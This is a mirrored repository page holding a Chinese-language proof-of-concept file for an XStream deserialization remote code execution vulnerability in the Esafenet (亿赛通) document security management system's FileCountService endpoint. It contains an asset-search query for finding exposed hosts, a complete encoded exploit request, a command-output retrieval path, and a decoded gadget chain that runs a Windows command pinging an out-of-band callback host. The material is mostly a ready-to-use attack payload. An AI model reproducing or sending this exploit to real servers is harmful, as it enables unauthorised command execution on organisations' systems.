admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/亿赛通/亿赛通电子文档安全管理系统旧版/亿赛通电子文档安全管理系统FileCountService存在xstream反序列化漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

102 lines
9.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞
# 一、漏洞简介
亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品保护范围涵盖终端电脑Windows、Mac、Linux系统平台、智能终端Android、IOS及各类应用系统OA、知识管理、文档管理、项目管理、PDM等。亿赛通电子文档安全管理系统FileCountService存在xstream 反序列化漏洞
# 二、影响版本
+ 亿赛通电子文档安全管理系统
# 三、资产测绘
+ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
+ 登录页面
![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/0FvUQBZBTUtW7DR2/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-696413.png)
# 四、漏洞复现
```plain
POST /CDGServer3/FileCountService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 2657
Accept-Encoding: gzip
IENBCKMHHBGCCGPJPEFFFOAGCOOGHFFDBAMJLPIIMBFKPMJIJKHJCNIMHIOFPJCFAOJAADMKDCLKKCNINDOAOCDHIEMCNKFEJHAAGDCNPIPABKAKCBCMBAPIOJOINBGBKFNMIHCHPKIHMHKCCHFDNFHAEIGDJFNLBKPGCOGKKMMODNADCINGAHENHPLOHHCABLPKDFDLGBKGJKDINLMAJGEDKHNCOCDFONAMKKBHJGKOHBKIKNFCAEGAJKLJGEIGEOEAIGPHPEBLMNHPJCKEJDBMIEOKEEHHNFHKBIKFELMGLCBPHCAODNFBCGIOJFGECNLKNDFMDGBACCEIGEHHLOGPCIPLIMIGFKNEDFGFKKLKCEOHEJEENEKGFDMNIMHGLPOENCPNPHDHAIIKELIMIOOIDPGFCNGBPJNPEIDCDEPHBMPNFCHCJICOGDDENICOEEEBKFLOAEFKBFPJKNLEBCBLGPHLDAPDBKGNICLNNBLGLICDFAILMEJEDMIGFOGEIHFGJCNDGDKLHBDMFGGGGLMHDNBFECEIDPLGPNJMKHINBNJABNMNCHGAPHJOCBPNDDBJMADOIPFHDDECBIHMPDOIPCADCKOOBAMBPHOLCEOJNBFAOFGCOFKILCBPJGFLOLAAICBCAEFFKLOPGOBANGPHILDODOJNHNOMHKIDACOCGHODPDBBMBKFNEFPACOKBFNKNFNCFIPINBHKBMMGADELHLKDOHDMAMCAJKKPHFLNLIEEAJHIMMCBMGNFCDFGMGODECPJFJMDLOKOEKGJMMDHCBABGAPMHPNHGEFCKGMPIGBEJLLCCPBEAJFIALANKKAPKGNKNELJDNJMAKGOHNDCFKGOAPDDMDHNICGPEFONKBEFCOGPFFBEMMHEMIPBLEJFJAFJINIMMKGHBHAGDBMHHIINDNDNOHGOCAGIEAFEMHBOGEJNMKEHJIMANMICIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKECKBBDHFFNLAIHBBJIDBMCACIBMPELHBKJOBNMJHFGFDONBHIDABKIFFLFFONJAGDOEHEDLILAFKGHMFEPDJBMKCOBLFBBPKKFJDBAFLIDEEJIGCILEJCPHMPJDEAFLDCGFIBBIAIJELJELGGJOGKKGFJAPBPHDOPDGGNPLEDJOJNNNOLGCEMBLECPLOEDPOEAKFPALMOOEOJCJOOIDFDJMNAAMBMDOFKEHAGPGMCFOACPGHKDBDLHALONFAJLOGEIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEENNMJNJDLNKCCGIMKEDFNNGMAAENLKHONOPHFBIGELCBHLDIBFCOKJKEFFFEODJJMONDDDGIMIJAEPCLOAIKKJFGEOGEKHOHKABBOEFEHMGJPDFBPMCHPBIBOAMAGPOBICFGGJGFBGLJFONGBGHCNMDLHOPJHFDCMIAFFOKBKCGFEKGAGGGCKEOEOGCJANKKIBKJBMIHLGJIMELPHHCDFNNDAHKHMMHAPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHEPGGDNMIGEJICGKKCKNPOGPDCENCPIGEJOJEGHHHHLIGIEFIDHHBADCOMLOILLCMNAGIPHJNJNINNGBOIJEIIEBCKHNDBBIJIBHMPHMCFDGLAKAIJCDCMLIODBPCMCMHGDGODKBCJIGEHMLNFIPFDIHELCJKNFIFONFHIHIPKIFBCNDBPJLHONIMGOLOGDHAMKJNBIHCPOJHBGNBNJGHJFNNDHBNEMGHOKFLBFLKIIOBKGCCKJHMHMJPCHDHMHDNJPKPEPKKDEIBPCCDOBAFOKAIOHJGDKBNHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOFNPDDLNCEIDDNKBINIELBKPIBKPBDPGGGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDKMBPDOPNAICNNDNPCCMNOJCOFHNAPOLNCOJCEMKDDBBDCCJKFMJNEEEOKNMGDCKJHCMKEFCBEHLMIKKKMMIJFCHKHINFPGPACDAAEPEJLGLJOIBODGCPNIHMFDJPMJBOIECONEAJCCAGGKDAAOPCHLHGFGIICLPCPLIEEEAHPMLOMKBBMLNBMFEIFIODPCIHGOKEINIBDALBDPHDGABDBLOKCPCLJBGEBJABHBJKKMPKNBOACJOEDCGLHMLNJCIGPDENPGODCDFMLKCFJEMFDONJKPJFMJKLNGIIOLFNIEKPDLLFDDLFOBDAKJECFNCICGBOGOKMFAPKCNCBHECFFCAEBAKIJKEDGAMLLLEICHDCBLFKFKNJENEFNIHHPPCDIBOKPKOPNMOGLJIPHKOBOABIDKNNAJMOCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDAEIAHAOKMBAPHMAMJEHADCHNLLMFBJBHBHHNLELIFCBNHACHNAFCIOAKOLJJBOGNIGMCEMOBKNNJCKAIBNFMALPKNACFCNIMDIFAKBFCCEMKLBOJNJJMGFPKFAMFINCIIDIGGANFCJLEEIFNHGEDLCGOADFFKBFMKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHEHJJPOHBKABNIPLFDBLOHBEPEJHKJGPPIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEABDPFDCBALFHCJFFCIFMMCGDJFOBBMIJDABFJEBOINJFJIEMNKLMANHBJACCEMAAEJIAHGENPCCOIPMINBLODFHOEFEMMMNLANHOFKKGLONPGFFCCLMHPIBKOEGEJEOFNGLHFFFCJPOBKBAEBOCJJHOHFCPDFNPDGKNOGJCFAHOBHBLMEMEFCBIJIPAPGODFOGFOFCHHAJKGFHFAFMAFJFCAMIAIGJAPFNPDLDFLDOBDHGJFPPANDAIBBGAHHBCIGGBILAMDIAEFNBJIDBEKEPFAHJKKCADDPCKCEPNNEJOLDKABIAPEBOIINFMDPDHEPFOMCIFMBKHPAHMIGKEIPPCDGJNIEAEIHOKGFAGPMFAONMIGECMBIMFFDEEEOBHGIFKMHJIBJBFOCGOFKIGBFHCIGCOCEAKEAPPGKFOOOBKPEGIAJOPBAHGPPLGCKEGBJGJPFKGNECMPFABADCPAPIJOCJEMFCEEBHALEIHPAIAMOGIHJAJKJLJMADMOOCEGCAPLIFHINJHKLJCBOBCGOIMDKJBABCMDHEHJFDDHJMNBBGOPGCELILLONJNFJKDKLMEJOGPIMPDIBBMPMALGJPHEEDDAHKLAHNGJBMHNLJLJCKIGOGLGPGEPABONGLEDGJIEMNOLFBFNJKJBAMKANBMAAGMNAJOIMPCIBBDEMMJEANGBHHEDELPBGIKDLAMHLPHOPNFNPLKFCLHADEDOJEBIMNIOGEEHKLGFPGKOFOBJDPKOFABICCDOCHGKFLPHLKKOCMJJOGMFNIDPPDLHBNGNEMFEIMIEDFJPMFEIIFFHGFIEGMGBLFKKPGJKKOBMFIHCACNMDEHJLLOANAIHAHFGELFEOJMABALGMENKFNBNPMLDIKPJHBKGEAIBGDIMIAGDAIENNHBABAEGJGPFIFHAHOOPOCKBLNJPJACLFAAIMKFDMFILOFBMAPJPJMOHNNMANGFNJEMNFBJCCNGFLICOKDMHACNPEPGCHIJOKMKPDBJIKFOMPCNBILHGLJJJALBPNBBBLJLNALCKBJBMOHOPIPFKPAKOBALGMENKFNBNPMLDIKPJHBKGEAIBGDIMNNIKHPBFJAKOEEPBOAIIKOEICJOMCGADMMKJNGNAKEHMDDBMJGGLJLGHLAIOIFBLHLLLCIEMKHCBANEHPHAMPCPJACHMBGPHMMMBCKFHHGJBBBGFIHENAKJEHOOACLADMKFJIDGEHNANAACDIGJDINCAMEHOIIPJHAAIBIPMEEHLIOBHGMICGAALCEKFNFNBJNACEHDMDEGCPMNPAAFFHHJKMPMADKBBLGKKJMEJDKAHLEKIDFPKLLJENFDHJDMPKFGNGKEBJBEBPLKCHJMCBALICLGNGDCAMFNCNJGFIEODKPOBNJHGIIICPOGICEBIJFLCIHGOELNDCLIMKJBLGOAONEFFJKOLFLLIDOEJAECJPDPJHAGFNDAPGEGNPJODCPGFMAJHIINKLILMALMNEFHBGHMGGODBKFPKGPIAPMFEJOANAHEIGFJNOOMAOHKBIGLFEJMDICOLEAPNJIPDBMHLOCFBCBDKKAAHBEINNPFDAGOOKOAPFCPHDKNBNIAOFIBFBKLBFAKICAOJPOKPJNDEHGEHAMMEEKKIOAANIDMOAGKEIBNCKPMLPJGDMONAPMAGGPMDJIPBNDMPDGINGBCGEPDDDINPFJHEKKJIPPADMOKJPIEBAIBCJBGOJFEBLHNBLFABAMDPFDEANKPDEAENBLGIMIMLKBDFHEFHHJLPGGBENHGMLGLPJMPMPFEKGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLFEEIKMICBBDONOABFHNMGHPLKOEPPBDDGKBNCJGIFJECLHGBLHDIEJOIAILLEJNJGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLDAGMKNALPEGPCBCPBKEAAEKPLHIEKGLGPCAFBBPGHBMBDLMPHIOPCNNMFPJHKNINKHNJANGIHKHEDDGKGEFJIEPOCGFGLALANFMLAAJIFPIBIJBAFBHDDOJPPAHMFPGNMPGBJKFBCLEMAGKMJGMENMFPMDHKAFFKKNHNICEPICAPIBAJHFKDHHNLHBAGHJFEFEJELFBJFOECBNGODBBKBANCCABIPMGJABODCIMNPOAECKBECOGDJJDNKLJFGDNGFAAIGDEBMFIFMLBAGHJNNGJACPKEMENKDBIMOLFAEAGNFOFEFNHJMJFDEDCJAGGGPFOHNHIIDJLMFNGHLPEENAGKAEBAONIMGPFBJNBOCCHKEEHAACFLJKHAAFGIPAGLKCBFIGPBJLEODJIOPEALFLKCAJPFKMLONOBAMEHEOLAMHEOGLFJAOPGOCJPMOJCACFDBCMGCFNNLHIEPLOHLIICJAAKINIBHEHPLBFNMFEINBBMHMAJKNDFEPJFCPEOCGOHENHIAHNBBPAAICKCDAOJMMHMDDAANEAIPCCGLLNFIMFHJKKGFLMHILLMLEGFIPABOAMBDDEBCHEHPLHJHNDFCNBFABAPJANNLLHLNNNLLIAIHKHGDPAJOJOAPIPGNJNIHDKKFPNMKDCEKHAFJFKPFOKLFABGEBOFLFCGCCJ
```
![1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea.png](./img/0FvUQBZBTUtW7DR2/1705077486607-cd243520-9faa-4092-9449-cd3391ce2eea-856627.png)
获取命令执行结果
```plain
/test.txt
```
![1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37.png](./img/0FvUQBZBTUtW7DR2/1705077513733-b7abd167-6797-469e-b228-3d58e55f8f37-825432.png)
```plain
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command class="java.util.Arrays$ArrayList">
<a class="string-array">
<string>cmd</string>
<string>/c</string>
<string>ping</string>
<string>cnvd_test.zfdaqyzxch.dgrh3.cn</string>
</a>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
```
> 更新: 2024-04-20 22:01:34
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xyoufkqvrrixgyhy>
Reference in New Issue View Git Blame Copy Permalink